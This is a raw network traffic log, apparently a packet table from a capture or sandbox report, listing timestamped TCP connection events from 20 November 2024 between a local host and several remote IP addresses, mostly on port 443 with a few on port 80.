                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.013413906 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.013428926 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.023014069 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.023026943 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.023093939 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.023690939 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.023699999 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.153018951 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.153052092 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.153117895 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.154372931 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.154387951 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.571824074 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.577625036 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.577652931 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.578201056 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.578207016 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.611337900 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.612006903 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.612037897 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.612510920 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.612517118 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.619054079 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.619549990 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.619565010 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.620035887 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.620039940 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.631937027 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.632333994 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.632354975 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.632762909 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.632767916 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.687246084 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.687994957 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.688011885 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.688616991 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.688785076 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.688788891 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.688793898 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.688836098 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.689310074 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.689327955 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.689337969 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.689343929 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.690365076 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.690438986 CET49837443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.694709063 CET49837443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.694722891 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.695154905 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.696474075 CET49837443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.697798967 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.697810888 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.697873116 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.697994947 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.698007107 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.717600107 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.717809916 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.718085051 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.718406916 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.718420982 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.718431950 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.718436956 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.719511032 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.719577074 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.719680071 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.719693899 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.719818115 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.720339060 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.720346928 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.720356941 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.720360994 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.723866940 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.723880053 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.723980904 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.724744081 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.724754095 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.724896908 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.724915981 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.724980116 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.725099087 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.725114107 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.734982014 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.735594034 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.735651016 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.735681057 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.735693932 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.735707998 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.735713005 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.739345074 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.741549969 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.741580963 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.741667986 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.741854906 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.741867065 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.769023895 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.769121885 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.771167040 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.771178007 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.771567106 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.790184021 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.790379047 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.790463924 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.790864944 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.790874958 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.790884972 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.790890932 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.795186996 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.795202017 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.795260906 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.795514107 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.795523882 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.814357042 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.856955051 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.903341055 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.029777050 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.037353992 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.037431955 CET49837443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.037604094 CET49837443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.037626982 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.037636995 CET49837443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.037642956 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.054976940 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055006027 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055013895 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055023909 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055054903 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055075884 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055092096 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055130005 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055150032 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055217981 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055273056 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055279970 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055629015 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.055686951 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.065856934 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.065866947 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.065895081 CET49839443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.065900087 CET4434983920.12.23.50192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.097074986 CET8049832185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.097290993 CET4983280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.187551022 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.187597990 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.187688112 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.188378096 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.188401937 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.202728987 CET49780443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.217137098 CET4983280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.223239899 CET8049832185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.476013899 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.476159096 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.476646900 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.476655960 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.476972103 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.477003098 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.477056980 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.477297068 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.477300882 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.477566004 CET49841443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.477572918 CET4434984113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.477742910 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.477756977 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.478169918 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.478174925 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.478914976 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.479295015 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.479302883 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.479717016 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.479722023 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.583260059 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.583290100 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.583339930 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.583360910 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.583444118 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.583694935 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.583705902 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.583722115 CET49844443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.583725929 CET4434984413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.587249994 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.587287903 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.587364912 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.587567091 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.587582111 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.589500904 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.589530945 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.589574099 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.589591026 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.589628935 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.589854002 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.589854002 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.589864016 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.589874029 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.590035915 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.590770960 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.590831995 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.590866089 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.590876102 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.590889931 CET49843443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.590897083 CET4434984313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.592964888 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.592991114 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.593077898 CET49851443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.593102932 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.593116999 CET4434985113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.593163967 CET49851443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.593261003 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.593274117 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.593317032 CET49851443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.593333006 CET4434985113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.656878948 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.657519102 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.657533884 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.658051014 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.658056021 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.758011103 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.758069038 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.758245945 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.758467913 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.758485079 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.758495092 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.758500099 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.761960030 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.761982918 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.762062073 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.762253046 CET49852443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.762265921 CET4434985213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.950953007 CET8049832185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.951014996 CET4983280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.993230104 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.993314028 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.995912075 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.995924950 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.996193886 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.998274088 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.998339891 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.998344898 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.998519897 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.043337107 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.172537088 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.173247099 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.173317909 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.173727036 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.173753977 CET4434984840.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.173772097 CET49848443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.242727041 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.243808985 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.251101017 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.251112938 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.251791954 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.251796961 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.252144098 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.252161026 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.253002882 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.253009081 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.264039040 CET4434985113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.264744997 CET49851443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.264765024 CET4434985113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.266410112 CET49851443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.266421080 CET4434985113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:31.349133968 CET4434984913.107.246.45192.168.2.6
